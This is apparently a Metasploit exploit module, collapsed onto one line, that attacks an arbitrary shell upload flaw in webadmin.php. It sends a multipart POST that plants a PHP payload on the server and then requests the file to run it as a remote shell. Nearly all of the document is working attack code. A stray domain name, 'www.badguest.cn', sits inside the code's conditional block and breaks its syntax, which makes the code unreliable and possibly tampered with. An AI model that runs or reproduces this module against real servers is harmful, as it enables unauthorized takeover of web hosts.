|
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'webadmin <= Shell Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary shell upload vulnerability in the webadmin.php }, 'Author' => [ 'Caddy-Dz' ], 'License' => MSF_LICENSE, 'References' => ["http://wacker-welt.de/webadmin/webadmin.php.gz" ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sept 13, 2011' )) register_options([ OptString.new('URI', [true, "Path to webadmin ", "/"]), ], self.class) end def exploit boundary = rand_text_alphanumeric(6) fn = rand_text_alphanumeric(8) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; " data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n" data << payload.encoded data << "\r\n--#{boundary}--" res = send_request_raw({ 'uri' => datastore['URI'] + "/webadmin.php", 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => data.length, } }, 25) if (res) www.badguest.cn print_status("Successfully uploaded shell.") shell_path = res.body.split("_")[0] print_status("Trying to access shell at #{shell_path}...") res = send_request_raw({ 'uri' => datastore['URI'] + shell_path, 'method' => 'GET', }, 0.01) else print_error("Error uploading shell") end handler end end
|
|
|